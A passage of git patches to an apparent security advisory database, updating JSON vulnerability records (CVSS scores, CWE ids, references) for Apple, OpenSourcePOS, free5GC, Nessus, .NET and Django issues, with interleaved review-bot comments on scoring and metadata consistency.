"published": "2026-02-12T00:31:03Z",
"aliases": [
"CVE-2026-20608"
],
"details": "This issue was addressed through improved state management. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -36,8 +41,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-770"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:04Z"
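Review bot: The v3 vector added in the first hunk, `"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"`, scores CVE-2026-20608 as locally reachable (AV:L), while the `details` line describes processing maliciously crafted web content, which is normally reached over the network; this looks like a possible attack-vector mismatch inherited from the upstream scoring source. The base score stays in the Medium band either way (5.5 under AV:L, 6.5 under AV:N), so the `"severity": "MODERATE"` set in the second hunk is probably unaffected, but the vector itself should be verified rather than re-published as-is. The remainder of the record lies outside these two hunks.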
diff --git a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json
index 6f0497ef22ac3..21e93d4d54400 100644
--- a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json
+++ b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json
@@ -30,7 +30,8 @@
],
"database_specific": {
"cwe_ids": [
- "CWE-122"
+ "CWE-122",
+ "CWE-787"
],
"severity": "HIGH",
"github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json
index fd782e26d81f6..eddabd2081f8b 100644
--- a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json
+++ b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-p47v-wp9g-8362",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-12T00:31:04Z",
"aliases": [
"CVE-2026-20609"
],
"details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
+ }
+ ],
"affected": [],
"references": [
{
@@ -48,8 +53,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-125"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:04Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json
index 1e43ff6433e4b..b6d3c0bc1c860 100644
--- a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json
+++ b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-p5cr-gq3j-93c4",
- "modified": "2026-02-13T00:32:51Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-13T00:32:51Z",
"aliases": [
"CVE-2025-70845"
],
"details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) exists in the /setting/ page where the \"intro\" field is not properly sanitized or escaped.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -24,8 +29,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-12T22:16:03Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json
index d4716738bd91d..372a3a4a8ad50 100644
--- a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json
+++ b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-p5wr-5p37-2wm6",
- "modified": "2026-02-07T00:30:27Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-07T00:30:27Z",
"aliases": [
"CVE-2026-1731"
@@ -23,6 +23,10 @@
"type": "WEB",
"url": "https://beyondtrustcorp.service-now.com/csm?id=csm_kb_article&sysparm_article=KB0023293"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/win3zz/CVE-2026-1731"
+ },
{
"type": "WEB",
"url": "https://www.beyondtrust.com/trust-center/security-advisories/bt26-02"
diff --git a/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json
new file mode 100644
index 0000000000000..a1ff3a4c32013
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qqhc-37jx-7gh5",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-70095"
+ ],
+ "details": "A cross-site scripting (XSS) vulnerability in the item management and sales invoice function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70095"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70095.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/opensourcepos/opensourcepos"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T16:16:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json
new file mode 100644
index 0000000000000..b61da74c7afe4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r3p8-h9vv-9cqc",
+ "modified": "2026-02-13T18:31:24Z",
+ "published": "2026-02-13T18:31:24Z",
+ "aliases": [
+ "CVE-2025-70093"
+ ],
+ "details": "An issue in OpenSourcePOS v3.4.1 allows attackers to execute arbitrary code via returning a crafted AJAX response.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70093"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/opensourcepos/opensourcepos/pull/4357"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70093.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.opensourcepos.org"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T16:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json
new file mode 100644
index 0000000000000..576b5627e73f5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vwfj-gc28-j2fg",
+ "modified": "2026-02-13T18:31:24Z",
+ "published": "2026-02-13T18:31:24Z",
+ "aliases": [
+ "CVE-2025-70091"
+ ],
+ "details": "A cross-site scripting (XSS) vulnerability in the Customers function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Phone Number parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70091"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70091.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.opensourcepos.org"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T16:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json
new file mode 100644
index 0000000000000..d7196d2e1ca2c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w7w9-2vjv-7r67",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2026-2026"
+ ],
+ "details": "A vulnerability has been identified where weak file permissions in the Nessus Agent directory on Windows hosts could allow unauthorized access, potentially permitting Denial of Service (DoS) attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2026"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenable.com/security/tns-2026-05"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-276"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T17:16:14Z"
+ }
+}
\ No newline at end of file
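Review bot: The `CVSS_V4` score string is stored with every environmental and supplemental metric spelled out as `X` (`/CR:X/IR:X/…/U:X`), whereas the reviewed advisory later in this series (GHSA-38c4-r59v-3vqw) trims the same kind of vector down to the base and threat metrics. `X` means "not defined", so the long form carries no information the short form lacks, and the two tiers of the database now store the same vector in two shapes, which complicates string comparison and de-duplication for consumers. The equivalent trimmed line would be `"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"`; presumably this is NVD's raw output passed through, so the normalisation belongs at ingest rather than in a hand edit.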
diff --git a/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json
new file mode 100644
index 0000000000000..24f82d3dbbe7a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x3j4-874w-h7pv",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-70121"
+ ],
+ "details": "An array index out of bounds vulnerability in the AMF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted 5GS Mobile Identity in a NAS Registration Request message. The issue occurs in the GetSUCI method (NAS_MobileIdentity5GS.go) when accessing index 5 of a 5-element array, leading to a runtime panic and AMF crash.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70121"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/free5gc/free5gc/issues/747"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T17:16:11Z"
+ }
+}
\ No newline at end of file
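Review bot: `cwe_ids` is empty although `details` pins the defect precisely — index 5 read from a 5-element array in `GetSUCI`, producing a runtime panic — which is the textbook CWE-129 (Improper Validation of Array Index) case, so `"cwe_ids": ["CWE-129"]` can be filled from the description alone. `affected` is also empty even though free5GC is a Go project and a Go module path would make this matchable; which module contains `NAS_MobileIdentity5GS.go` is not stated here, so that needs confirming against the linked issue before an entry is added. `severity` being `[]` is consistent with NVD not having scored it yet, but the description itself (remote, unauthenticated NAS message, AMF crash) is enough for a reviewer to assign one rather than leaving `null`.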
diff --git a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json
index f5c1fe7f502f8..175244e5405e2 100644
--- a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json
+++ b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-xrqq-m9vv-pq36",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-12T00:31:04Z",
"aliases": [
"CVE-2026-20619"
],
"details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An app may be able to access sensitive user data.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -24,8 +29,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:05Z"
From 767802338fa8c1dbd8944581598134d805b99b23 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 19:45:13 +0000
Subject: [PATCH 11/36] Publish GHSA-qvhc-9v3j-5rfw
---
.../02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 12 ++++--------
1 file changed, 4 insertions(+), 8 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
index bbc291a2be5e0..eaff76ee3608b 100644
--- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json
@@ -1,18 +1,14 @@
{
"schema_version": "1.4.0",
"id": "GHSA-qvhc-9v3j-5rfw",
- "modified": "2026-02-12T17:44:46Z",
+ "modified": "2026-02-13T19:43:22Z",
"published": "2026-02-10T21:32:18Z",
"aliases": [
"CVE-2026-21218"
],
"summary": "Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability",
- "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected 
packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). 
Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.",
+ "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, <= 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, <= 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected 
packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). 
Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.",
"severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
- },
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
@@ -60,7 +56,7 @@
}
],
"database_specific": {
- "last_known_affected_version_range": "< 9.0.12"
+ "last_known_affected_version_range": "<= 9.0.12"
}
},
{
@@ -82,7 +78,7 @@
}
],
"database_specific": {
- "last_known_affected_version_range": "< 10.0.2"
+ "last_known_affected_version_range": "<= 10.0.2"
}
}
],
From b0da1d5857c7eaaccab279ecc444471f0098ad3b Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 19:57:35 +0000
Subject: [PATCH 12/36] Publish GHSA-6426-9fv3-65x8
---
.../2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
index a760766599ba5..4ca15dfff45b2 100644
--- a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
+++ b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6426-9fv3-65x8",
- "modified": "2026-02-03T19:35:57Z",
+ "modified": "2026-02-13T19:55:25Z",
"published": "2026-02-03T15:30:24Z",
"aliases": [
"CVE-2026-1312"
@@ -10,8 +10,8 @@
"details": "An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.\n\n`.QuerySet.order_by()` is subject to SQL injection in column aliases containing periods when the same alias is, using a suitably crafted dictionary, with dictionary expansion, used in `FilteredRelation`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\n\nDjango would like to thank Solomon Kebede for reporting this issue.",
"severity": [
{
- "type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
}
],
"affected": [
@@ -107,7 +107,7 @@
"cwe_ids": [
"CWE-89"
],
- "severity": "HIGH",
+ "severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-03T19:35:56Z",
"nvd_published_at": "2026-02-03T15:16:13Z"
From acfcbcdafb291203572a85474681a243af8bfe36 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 20:06:46 +0000
Subject: [PATCH 13/36] Publish Advisories
GHSA-38c4-r59v-3vqw
GHSA-cvhv-6xm6-c3v4
GHSA-g433-pq76-6cmf
GHSA-cvhv-6xm6-c3v4
---
.../GHSA-38c4-r59v-3vqw.json | 37 ++++++-
